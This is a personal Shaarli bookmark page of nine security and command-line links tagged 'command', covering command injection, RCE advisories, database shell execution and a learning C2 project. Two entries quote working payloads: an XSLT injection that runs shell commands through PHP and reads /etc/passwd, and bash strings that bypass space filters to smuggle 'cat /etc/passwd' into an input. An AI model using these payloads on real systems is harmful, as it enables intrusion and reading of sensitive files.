776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
9 results tagged command x
  • HTWMCL?
    July 16, 2024 at 3:49:48 PM UTC * - permalink -
    QRCode
    - https://www.htwmcl.fr/
    howto command line find tools
  • thumbnail
    GTFOArgs
    May 26, 2023 at 10:59:59 AM UTC - permalink -
    QRCode
    - https://gtfoargs.github.io/
    cmd injection command args
  • thumbnail
    Fortinet FortiWeb OS Command Injection | Rapid7 Blog
    August 19, 2021 at 1:48:24 PM UTC - permalink -
    QRCode
    - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
    fortinet rce postauth os command injection fortiweb
  • thumbnail
    04. Command Execution - Security Knowledge Base
    June 18, 2021 at 6:31:55 PM UTC - permalink -
    QRCode
    - https://github.sofianehamlaoui.fr/Security-Cheatsheets/databases/sqlserver/3-command-execution/
    sqlserver mssql command execution agent xp_cmdshell job
  • thumbnail
    ORACLE-BASE - Shell Commands From PL/SQL
    March 10, 2021 at 11:45:39 AM UTC - permalink -
    QRCode
    - https://oracle-base.com/articles/8i/shell-commands-from-plsql
    oracle shell command java
  • thumbnail
    r3nhat/GRAT2: We developed GRAT2 Command & Control (C2) project for learning purpose.
    February 10, 2021 at 3:06:30 PM UTC - permalink -
    QRCode
    - https://github.com/r3nhat/GRAT2
    grat c2 command control
  • The hidden dangers of XSLTProcessor - Remote XSL injection | Acunetix
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
      <script>confirm("We're good");</script>
       <!--
       <xsl:value-of select="php:function('exec','id')"/>
       <xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/>
       <xsl:copy-of select="document('/etc/passwd')"/>
       <xsl:value-of select="php:function('passthru','ls -la /')"/>
       -->
       <xsl:value-of select="php:function('passthru','ls -la /')"/>
    
      </xsl:template>
    </xsl:stylesheet>
    October 16, 2020 at 3:57:50 PM UTC * - permalink -
    QRCode
    - https://www.acunetix.com/blog/articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/
    xslt injection command execution rce lfi
  • thumbnail
    Netstat Commands - Network Administration Tutorial - HackerSploit

    netstat -c –Continuous output
    netstat -r –Displays routing table
    netstat -ie –Network Interfaces
    Displaying all Connections
    netstat -a
    Displaying all TCP
    netstat -at
    Displaying all UDP
    netstat -au
    Displaying all listening TCP Ports
    netstat -lt
    Displaying all listening UDP Ports
    netstat -lu
    Process Identification
    netstat -p
    netstat -atp –Shows service name
    Displaying only listening TCP connections
    netstat -tnl
    Displaying only listening UDP connections
    netstat -unl
    Combination: netstat -nlpt –Shows process name and PID
    Displaying a particular port
    netstat -anp | grep:443

    February 8, 2019 at 11:12:17 AM UTC - permalink -
    QRCode
    - https://hsploit.com/netstat-tutorial/
    netstat hacking tcp udp commands command
  • thumbnail
    Command Injection Without Spaces

    {echo,hello,world}
    CMD=$'\x20a\x20b\x20c';echo$CMD
    CMD=$'\x20a\x20b\x20c'&&echo$CMD
    google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD

    December 10, 2018 at 4:43:56 PM UTC - permalink -
    QRCode
    - https://www.betterhacker.com/2016/10/command-injection-without-spaces.html
    command injection hacking linux bash bypass brace expansion
Links per page: 20 50 100
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation